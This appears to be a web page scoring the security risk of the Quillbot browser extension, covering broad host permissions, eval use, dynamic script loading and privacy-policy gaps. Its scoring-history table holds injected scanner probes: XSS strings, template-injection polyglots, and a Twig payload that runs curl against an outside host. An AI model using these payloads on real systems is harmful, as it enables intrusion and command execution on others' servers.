Quillbot: AI Writing Assistant to Grammar Check, Paraphrase & Translate
iidnbdjijdkbmajdffnidomddglmieko
Risk Score
5.21
Risk Level:
Medium
Recommendation:
🟡 MEDIUM RISK — review
Top Risks
- Broad *://*/* host + scripting + cookies enables full page read/write and cookie access across all sites for 6M users.
- eval() in extension-loader.js and new Function() in toolboxjs/sw files present code-execution risk if any input is attacker-controlled.
- Dynamic script element creation in toolboxjs.js can load arbitrary JS at runtime, bypassing static analysis.
- Privacy policy fetched but scope_extension=false and data_collection=false — policy does not cover extension-specific data handling.
- uninstall_url_hijack=true: extension sets an uninstall redirect URL (target not captured), may exfiltrate identity on removal.
Evidence
- broad_host_permission manifest *://*/* host_permission combined with scripting and cookies enables all-site data access for 6M installs.
- eval_user_input crx extension-loader.js: o.eval(u) — direct eval of variable, potential arbitrary code execution.
- script_src_dynamic crx toolboxjs.js: document.createElement('script') with dynamic src — runtime script loading.
- uninstall_url_hijack store uninstall_url_hijack=true; target unknown — may phone home or redirect on removal.
- privacy_policy_scope_missing api Policy fetched (212KB) but scope_extension=false; does not specify what this extension collects.
- ai_content_processing store AI writing assistant injects into all pages and processes user text; high data-exfil surface.
- featured_by_google store is_featured_by_google=true; partially offsets reputation risk.
- no_cve_findings crx cve_findings_raw is empty; no known-vulnerable bundled libraries detected.
Permissions Breakdown
- alarms low Schedules background tasks; minimal data exposure.
- cookies high Can read/write cookies across origins; paired with *://*/* amplifies risk.
- storage low Local extension data storage; low direct risk.
- activeTab medium Access to current tab on user gesture; moderate scope.
- contextMenus low Adds right-click menu items; no data access on its own.
- notifications low Shows notifications; limited data risk without host access pairing.
- scripting high Programmatic script injection into pages; high capability paired with *://*/* host.
- sidePanel low Opens side panel UI; low direct risk.
- *://*/* high Broad host permission covering all URLs; maximum reach for content injection.
- https://quillbot.com/ low Scoped to own domain; expected for AI service communication.
Pillar Scores
Permissions6.50
Reputation3.50
Network3.50
Webstore4.50
Maintenance0.00
Privacy9.00
Code Quality7.50
CVE Exposure0.00
Scoring History
| %76%33%2E%36%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%43%37%74%34%28%39%37%30%33%34%29%22 | 5.79 | Medium | review | 2026-08-05 |
| 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> | 5.84 | Medium | review | 2026-08-05 |
| v3.6&n968459=v967850 | 4.30 | Medium | review | 2026-08-05 |
| %76%33%2E%36%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%76%6E%44%43%28%39%31%38%35%34%29%22 | 5.48 | Medium | review | 2026-07-29 |
| v3.6"onmouseover=vnDC(96952)" | 5.55 | Medium | review | 2026-07-29 |
| bfg4100<s1﹥s2ʺs3ʹhjl4100 | 5.57 | Medium | block | 2026-07-29 |
| dfb__${98991*97996}__::.x | 5.72 | Medium | review | 2026-07-29 |
| bfgx8082%C0%BEz1%C0%BCz2a%90bcxhjl8082 | 5.49 | Medium | review | 2026-07-29 |
| {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitoosmjwadkn22515.bxss.me")}} | 5.46 | Medium | review | 2026-07-29 |
| v3.6&n992247=v991916 | 5.38 | Medium | review | 2026-07-29 |
| v3.6 | 5.21 | Medium | review | 2026-06-16 |
Bookkeeping
Rubric v3.6
Scored at 2026-06-16 07:43
Listing SHA
52f8d410f0d5…
Force block
— not fired
Score recovered
no
Elapsed
32.9s